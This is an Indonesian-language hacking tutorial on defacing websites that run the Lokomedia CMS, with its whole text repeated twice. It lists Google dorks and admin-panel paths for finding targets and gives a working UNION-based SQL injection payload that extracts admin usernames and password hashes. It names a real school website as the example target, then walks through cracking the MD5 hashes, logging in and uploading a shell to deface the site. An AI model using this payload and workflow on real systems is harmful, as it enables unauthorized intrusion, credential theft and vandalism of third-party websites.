Oke welcome back with me Owner paling ganteng ,paling kece, paling keren, paling waw di jagat raya ini.. kali ini gue mau kasih tau kalian tentang tutorial deface sql LOKOMEDIA
DORK :
//site.com/admin
//site.com/adminweb
//site.com /redaktur
//site.com/administrator
Selanjutnya persiapkan bahan dork sql injection untuk deface cms lokomedia
- inurl:/statis-1-profil.html
- inurl:/statis-2-profil.html
- inurl:/statis-3-profil.html
- inurl:/hal-tentang-kami.html
Tambahan dork fresh terbaru deface metode poc lokomedia
inurl:/kategoriberita-- ext:html
inurl:hal-visi-misi.html
inurl:hal-program--kegiatan.html
inurl:hal-struktur-organisasi.html
inurl:hal-kata-sambutan.html
intext:copyright by inurl:statis-1 ext:html
inurl:statis-1-tujuan.html
inurl:/statis-10 ext:html
inurl:/statis-16 ext:html
inurl:/kategoriartikel-1-Berita ext:html
inurl:/statis-5 ext:htm
intitle:"sejarah" inurl:/sejarah ext:html
intext:"bojonegoro" inurl:/sejarah ext:html
intext:"kalimantan" inurl:/sejarah ext:html
intext:"jakarta" inurl:/sejarah ext:html
intext:"tuban" inurl:/sejarah ext:html
intext:"lamongan" inurl:/sejarah ext:html
intext:"indonesia" inurl:/sejarah ext:html
intext:"danau" inurl:/sejarah ext:html
intext:"pantai" inurl:/sejarah ext:html
intext:"wisata" inurl:/sejarah ext:html
Exploit dalam belajar cara deface poc lokomedia cms
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Berikut dibawah ini langkah-langkah cara deface menggunakan metode poc lokomedia
1. Contoh target website cms lokomedia http://www.smaitnurhidayah.sch.id/statis-1-profil.html
2. Langkah selanjutnya tinggal tambahkan exploit ke dalam website yang vuln 1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
3. Kemudian cari user akses admin login yaitu admin username dan admin password. Tekan CTRL+U lalu kemudian cari akses admin login nya seperti gambar dibawah ini
Belajar Cara Deface POC Lokomedia
4. Diatas masih terlihat password hash MD5. Kunjungi https://hashkiller.co.uk untuk mengubah password menjadi normal (decrypt).
Belajar Cara Deface POC Lokomedia + Dork Fresh Terbaru
5. Lakukan akses admin login menggunakan admin finder login access diatas
6. Setelah berhasil login ke dalam website cms lokomedia. Silahkan lakukan deface dengan menitipkan file atau mengupload shell yang anda miliki.
DORK :
//site.com/admin
//site.com/adminweb
//site.com /redaktur
//site.com/administrator
Selanjutnya persiapkan bahan dork sql injection untuk deface cms lokomedia
- inurl:/statis-1-profil.html
- inurl:/statis-2-profil.html
- inurl:/statis-3-profil.html
- inurl:/hal-tentang-kami.html
Tambahan dork fresh terbaru deface metode poc lokomedia
inurl:/kategoriberita-- ext:html
inurl:hal-visi-misi.html
inurl:hal-program--kegiatan.html
inurl:hal-struktur-organisasi.html
inurl:hal-kata-sambutan.html
intext:copyright by inurl:statis-1 ext:html
inurl:statis-1-tujuan.html
inurl:/statis-10 ext:html
inurl:/statis-16 ext:html
inurl:/kategoriartikel-1-Berita ext:html
inurl:/statis-5 ext:htm
intitle:"sejarah" inurl:/sejarah ext:html
intext:"bojonegoro" inurl:/sejarah ext:html
intext:"kalimantan" inurl:/sejarah ext:html
intext:"jakarta" inurl:/sejarah ext:html
intext:"tuban" inurl:/sejarah ext:html
intext:"lamongan" inurl:/sejarah ext:html
intext:"indonesia" inurl:/sejarah ext:html
intext:"danau" inurl:/sejarah ext:html
intext:"pantai" inurl:/sejarah ext:html
intext:"wisata" inurl:/sejarah ext:html
Exploit dalam belajar cara deface poc lokomedia cms
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Berikut dibawah ini langkah-langkah cara deface menggunakan metode poc lokomedia
1. Contoh target website cms lokomedia http://www.smaitnurhidayah.sch.id/statis-1-profil.html
2. Langkah selanjutnya tinggal tambahkan exploit ke dalam website yang vuln 1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
3. Kemudian cari user akses admin login yaitu admin username dan admin password. Tekan CTRL+U lalu kemudian cari akses admin login nya seperti gambar dibawah ini
Belajar Cara Deface POC Lokomedia
4. Diatas masih terlihat password hash MD5. Kunjungi https://hashkiller.co.uk untuk mengubah password menjadi normal (decrypt).
Belajar Cara Deface POC Lokomedia + Dork Fresh Terbaru
5. Lakukan akses admin login menggunakan admin finder login access diatas
6. Setelah berhasil login ke dalam website cms lokomedia. Silahkan lakukan deface dengan menitipkan file atau mengupload shell yang anda miliki.